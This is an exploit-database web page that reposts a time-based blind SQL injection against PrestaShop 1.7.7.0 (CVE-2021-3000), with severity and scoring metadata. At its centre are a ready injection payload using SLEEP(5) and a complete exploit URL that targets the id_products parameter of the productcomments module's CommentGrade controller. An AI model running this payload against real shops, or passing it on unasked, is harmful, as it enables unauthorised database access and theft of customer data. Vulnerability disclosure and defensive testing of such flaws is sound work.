Advertisement






Prestashop 1.7.7.0 SQL Injection

CVE Category Price Severity
CVE-2021-3000 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-01-11
CPE
cpe:cpe:/a:prestashop:prestashop:1.7.7.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010090

Below is a copy:

Prestashop 1.7.7.0 SQL Injection
# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Date: 08-01-2021
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.